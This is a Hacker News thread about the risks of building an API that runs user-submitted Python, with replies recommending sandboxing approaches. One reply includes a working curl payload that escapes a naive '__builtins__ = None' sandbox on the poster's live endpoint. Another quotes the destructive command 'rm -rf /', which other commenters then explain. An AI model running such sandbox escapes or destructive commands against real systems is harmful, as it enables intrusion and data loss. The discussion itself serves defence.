Hacker News new | past | comments | ask | show | jobs | submit login
Ask HN: API to run Python code, what can go wrong?
13 points by nathanganser 10 months ago | hide | past | favorite | 18 comments
As a little weekend project, I'm trying to build an API to run python code and wondering what might go wrong.

Specifically, is there any way of building such a service that is safe from being hacked? My guess is that letting users input code that will be ran is never save, but I'd love some input on this.

The API can be tested here: https://api-run-code.herokuapp.com/ ... and here is the code: https://github.com/nathanganser/api-to-execute-python

For context, I'm thinking about building an app that needs to run user-inputted python code, and since I could not find a service that makes this easy, I just built an MVP of it.

You can use seccomp for this, which might allow you to build something very safe. Pypy also has a similar mechanism built-in: https://doc.pypy.org/en/latest/sandbox.html Or you can use virtual machines (you can build/find some that will boot in a few milliseconds)

edit: Your specific protection appears to be `__builtins__ = None` and otherwise run in the same interpreter. It is very naive. Here is an example hack that gets to your "secret data":

    $ curl -H Content-Type:application/json -d '{"code": "res = [c for c in ().__class__.__base__.__subclasses__() if c.__name__ == \"catch_warnings\"][0]()._module.__builtins__[\"__import__\"](\"play\").data"}' https://api-run-code.herokuapp.com/execute
(from https://nedbatchelder.com/blog/201206/eval_really_is_dangero... but really you could have googled it)

Thank you so much for this! That's super helpful!

(Late to the party, but PyCoder's Weekly brought me here)

The method I use for my autograder research platform is:

1) Build a test suite as a JSON string that gets passed to queue; on the student's side, they're given a Job ID that will check every few seconds on the job's status

2) When its their turn, I pass the submission to a Docker image

3) The docker image dumps the student's code into a "submission.py" file and then dynamically builds the test cases based on what came in the JSON file (using Python's unittest library)

3) Save the code's test results to my DB and mark the job ID as "done"

4) Once the student's AJAX request sees a "done", it also returns the test results as a JSON string, which is then parsed on to the screen

In terms of "safety", the big issues you'll need to test for are making sure that Docker does not have root access. Try to dig up some Docker vulnerabilities to poke holes in your system. You can also whitelist only a select number of libraries so users don't go importing things with vulnerabilities.

Here are some references:

  - Giles Thomas - Lessons Learned from Serving 1/4 million in-browser Python Consoles with Tornado - EuroPython2013
    - Link: https://www.youtube.com/watch?v=U_qp8u_BH_E
    - Description: Giles is from PythonAnywhere, the author of [Interactive shells on Python.org](https://blog.pythonanywhere.com/83/) blog post.

    - PythonAnywhere uses:
      - SockJS:
      - Repo: https://github.com/sockjs
      - pty (Python built-in module) for handling pseudo-terminals (with pty.fork):
        - Docs: https://docs.python.org/3.7/library/pty.html
      - epoll (Tornado's IOLoop.add_handler for async):
        - Docs: https://www.tornadoweb.org/en/stable/

  - Xterm.js: Terminal on the browser at https://xtermjs.org/

  - Jessica McKellar: Building and Breaking a Python Sandbox - Pycon 2014:
    - Link: https://www.youtube.com/watch?v=sL_syMmRkoU
    - pysandbox (author recommends running Python in a sandbox, not the opposite)

  - Interactive Shells on Python.org:
    - Link: https://blog.pythonanywhere.com/83/

  - CodeSandbox: Online web application editor (Angular, React, Vue, Vanilla JS)
    - Website: https://codesandbox.io/
    - Repo: https://github.com/codesandbox/codesandbox-client

  - Kaggle:

    - Description: Kaggle's infrastructure and systems allow for arbitrary code execution and scoring. It would be good to check it out and see what they get right.

    - Kaggle Learntools:
      - Purpose: Check exercises and notebooks submitted by users
      - Link: https://github.com/Kaggle/learntools

    - Kaggle Docker:
      - Purpose: Kaggle Python docker image
      - Link: https://github.com/Kaggle/docker-python/

    - Kaggle Infrastructure (Lessons Learned from Tens of Thousands of Kaggle Notebooks):
      - Link: https://www.youtube.com/watch?v=ENPBTl0uNOE

  - Miscellaneous Links:
    - Jinja has a sandboxed environment:
      - Link: https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py

Replit does this for their own services, and it seems like they might give you access to it, too[1].

That post is old and not very detailed, so maybe I'm misinterpreting it.

1. https://blog.replit.com/api-docs


from the page: "Our old code execution API has been deprecated."

That would be the perfect solution to this, that's for sharing! Hopefully they'll launch something new soon!

Another thought: "lambda" (FaaS) platforms.

They have already figured out how to isolate functions from harming the host system, and they've solved the issue of potentially infinite execution time.

You want to use some sort of sandbox or VM for this. Firecracker might fit your usecase: https://firecracker-microvm.github.io/

Thanks for sharing! I'll dig into this! Seems perfect :)

no problem! check out this post: https://fly.io/blog/sandboxing-and-workload-isolation/ (fly.io uses firecracker)

Isn't AWS Lambda like this: I write Python right into web interface to implement simple services, event handlers, etc.

Not really, the use case for example would be an app like Codecademy: - users input code - you need to run the code and provide the output

As an app, you would not send users to AWS Lambda right?

import os os.system("rm -rf / ")

I was trying to read about this, what's the purpose of this?

Sorry you got downvoted. It's a legitimate question. I think the parent comment was being ironic by pointing out a dangerous command that might be run. I think it would remove any files at the root directory.

rm -> remove/delete the given file

-r -> recursively delete files and subdirectories

-f -> remove forcefully without command prompt, specifically useful when deleting unwritable files

/ -> the root partition, basically the base of the entire system

When combined, it's dangerous because it could delete every file and directory on the root. I'm not sure, but I think you would need superuser (sudo) privileges to do so, but I'm not gonna test it:

sudo rm -rf /

Here's more on rm: https://www.geeksforgeeks.org/rm-rf-command-in-linux-with-ex...

Thanks for taking the time to explain, really appreciate the kindness :)

it will remove every file and directory on your computer without any prompts...

FastAPI probably does everything that you're looking for?

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact